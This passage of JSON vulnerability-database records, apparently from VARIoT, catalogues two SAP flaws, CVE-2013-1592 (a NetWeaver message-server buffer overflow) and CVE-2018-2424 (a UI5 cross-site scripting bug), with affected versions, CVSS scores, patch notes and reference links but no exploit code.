"db": "CNNVD",
"id": "CNNVD-201302-367",
"trust": 0.6
},
{
"db": "IVD",
"id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2013-1592",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "120350",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114279",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"id": "VAR-202001-0832",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
]
},
"last_update_date": "2024-07-23T22:37:43.319000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"title": "top page",
"trust": 0.8,
"url": "https://www.sap.com/japan/index.html"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18435"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18434"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/57956"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/cve/cve-2013-1592"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/24511"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1028148"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
},
{
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/186"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/185"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=28248"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/24511/"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1800603."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
},
{
"trust": 0.1,
"url": "http://www.sap.com/platform/netweaver/index.epx."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"date": "2013-02-13T00:00:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"date": "2013-02-15T23:44:44",
"db": "PACKETSTORM",
"id": "120350"
},
{
"date": "2012-06-28T03:51:55",
"db": "PACKETSTORM",
"id": "114279"
},
{
"date": "2013-02-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"date": "2020-01-23T19:15:11.327000",
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-31T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"date": "2013-06-12T18:46:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"date": "2020-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-367"
},
{
"date": "2020-01-31T17:08:36.590000",
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-367"
}
],
"trust": 0.6
}
}
var-201806-1433
Vulnerability from variot
SAP UI5 did not validate user input before adding it to the DOM structure. This may lead to malicious user-provided JavaScript code being added to the DOM that could steal user information. Software components affected are: SAP Hana Database 1.00, 2.00; SAP UI5 1.00; SAP UI5 (Java) 7.30, 7.31, 7.40, 7,50; SAP UI 7.40, 7.50, 7.51, 7.52, and version 2.0 of SAP UI for SAP NetWeaver 7.00. SAP UI5 is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201806-1433",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.52"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.51"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.50"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.40"
},
{
"model": "hana database",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "1.00"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "2.0"
},
{
"model": "ui5",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "1.00"
},
{
"model": "hana database",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "2.00"
},
{
"model": "ui5 java",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "ui5 java",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "ui5 java",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "ui5 java",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "5 1.00"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "5 java 7"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "50"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "5 java 7.30"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "5 java 7.31"
},
{
"model": "ui",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "5 java 7.40"
},
{
"model": "ui5",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "ui5",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "ui5",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "ui5",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "hana db",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "2.00"
},
{
"model": "hana db",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "1.00"
}
],
"sources": [
{
"db": "BID",
"id": "104459"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui5_java:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui5_java:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:2.0:*:*:*:*:netweaver_7.0:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui5_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui5:1.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:hana_database:2.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui5_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:hana_database:1.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2424"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "104459"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2424",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2424",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-2424",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2424",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@sap.com",
"id": "CVE-2018-2424",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201806-735",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP UI5 did not validate user input before adding it to the DOM structure. This may lead to malicious user-provided JavaScript code being added to the DOM that could steal user information. Software components affected are: SAP Hana Database 1.00, 2.00; SAP UI5 1.00; SAP UI5 (Java) 7.30, 7.31, 7.40, 7,50; SAP UI 7.40, 7.50, 7.51, 7.52, and version 2.0 of SAP UI for SAP NetWeaver 7.00. SAP UI5 is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "BID",
"id": "104459"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2424",
"trust": 2.7
},
{
"db": "BID",
"id": "104459",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006576",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "104459"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"id": "VAR-201806-1433",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:52:39.401000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "June 2018 Security Releases",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=495289255"
},
{
"title": "SAP Hana DB , UI5 and UI Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=80900"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2538856"
},
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=495289255"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/104459"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2424"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2424"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "104459"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006576"
},
{
"db": "NVD",
"id": "CVE-2018-2424"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-735"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "104459"
},
{
